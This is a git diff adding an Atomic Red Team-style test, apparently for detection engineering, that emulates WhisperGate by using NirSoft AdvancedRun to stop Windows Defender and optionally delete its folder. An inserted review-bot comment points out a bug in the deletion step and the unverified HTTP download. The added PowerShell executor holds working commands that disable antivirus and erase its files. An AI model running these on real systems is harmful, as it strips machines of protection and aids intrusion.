diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ea088629..c5d5a7c4 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -408,6 +408,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhis defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell +defense-evasion,T1562.001,Disable or Modify Tools,29,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 45112cd3..6b95d072 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -269,6 +269,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defende defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell +defense-evasion,T1562.001,Disable or Modify Tools,29,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 108378e2..987427a1 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -640,6 +640,7 @@ - Atomic Test #26: Disable Windows Defender with DISM [windows] - Atomic Test #27: Disable Defender with Defender Control [windows] - Atomic Test #28: Disable Windows Defender Tamper Protection [windows] + - Atomic Test #29: Disable Defender Using NirSoft AdvancedRun [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 11caa5f8..8c87acaa 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -445,6 +445,7 @@ - Atomic Test #26: Disable Windows Defender with DISM [windows] - Atomic Test #27: Disable Defender with Defender Control [windows] - Atomic Test #28: Disable Windows Defender Tamper Protection [windows] + - Atomic Test #29: Disable Defender Using NirSoft AdvancedRun [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c443f080..12f31568 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -27089,6 +27089,50 @@ defense-evasion: cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 1 name: powershell + - name: Disable Defender Using NirSoft AdvancedRun + auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d + description: "Information on NirSoft AdvancedRun and its creators found here: + http://www.nirsoft.net/utils/advanced_run.html\nThis Atomic will run AdvancedRun.exe + with similar behavior identified during the WhisperGate campaign.\nSee https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\nUpon + successful execution, AdvancedRun.exe will attempt to run and stop Defender, + and optionally attempt to delete the Defender folder on disk. \n" + supported_platforms: + - windows + input_arguments: + AdvancedRun_Location: + description: Path of Advanced Run executable + type: Path + default: "$env:temp\\AdvancedRun.exe" + delete_defender_folder: + description: Set to 1 to also delete the Windows Defender folder + type: Integer + default: 0 + dependency_executor_name: powershell + dependencies: + - description: 'Advancedrun.exe must exist at #{AdvancedRun_Location} + +' + prereq_command: 'if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else + {exit 1} + +' + get_prereq_command: | + Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip" + Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force + executor: + command: | + Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{} + if(#{delete_defender_folder}){ + $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse + Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 
/CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{} + } + cleanup_command: 'Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" + /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs + 8 /Run} Catch{} + +' + name: powershell + elevation_required: true T1078.002: technique: object_marking_refs: diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md index 28c0d149..dd4a4a52 100644 --- a/atomics/T1562.001/T1562.001.md +++ b/atomics/T1562.001/T1562.001.md @@ -62,6 +62,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too - [Atomic Test #28 - Disable Windows Defender Tamper Protection](#atomic-test-28---disable-windows-defender-tamper-protection) +- [Atomic Test #29 - Disable Defender Using NirSoft AdvancedRun](#atomic-test-29---disable-defender-using-nirsoft-advancedrun) +
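Review bot: In the new executor block, `$CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse` is an immediate invocation rather than a string: Remove-Item runs in the launching PowerShell session, `$CommandToRun` ends up empty, and the second AdvancedRun call therefore receives an empty `/CommandLine`, so the folder deletion (if it happens at all) is not performed through AdvancedRun as the description and the `/RunAs 8` flag imply; either the executor should be corrected to match the description or the description should state what actually runs, and any detection notes should reflect that the deletion attempt originates from the caller's own elevated powershell.exe. The `get_prereq_command` fetches `advancedrun.zip` over plain `http://` with no integrity check before the extracted binary is later launched with `/RunAs 8`; fetching over https and comparing the archive against a pinned hash (`<EXPECTED_SHA256 placeholder>`) before `Expand-Archive` would keep the test from executing a tampered download. `#{AdvancedRun_Location}` is also unquoted in both `Test-Path -Path #{AdvancedRun_Location}` and `cmd /c #{AdvancedRun_Location}`, so a `$env:temp` containing a space breaks both the prerequisite check and the launch. The same executor text is repeated in the T1562.001.md hunk; since the Indexes are generated, the fix belongs in the source atomic definition this index is built from.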
@@ -1186,4 +1188,62 @@ Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft +
+
+ +## Atomic Test #29 - Disable Defender Using NirSoft AdvancedRun +Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html +This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign. +See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 +Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 81ce22fd-9612-4154-918e-8a1f285d214d + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| AdvancedRun_Location | Path of Advanced Run executable | Path | $env:temp\AdvancedRun.exe| +| delete_defender_folder | Set to 1 to also delete the Windows Defender folder | Integer | 0| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{} +if(#{delete_defender_folder}){ + $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse + Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{} +} +``` + +#### Cleanup Commands: +```powershell +Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{} +``` + + + +#### Dependencies: Run with `powershell`! 
+##### Description: Advancedrun.exe must exist at #{AdvancedRun_Location} +##### Check Prereq Commands: +```powershell +if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip" +Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force +``` + + + +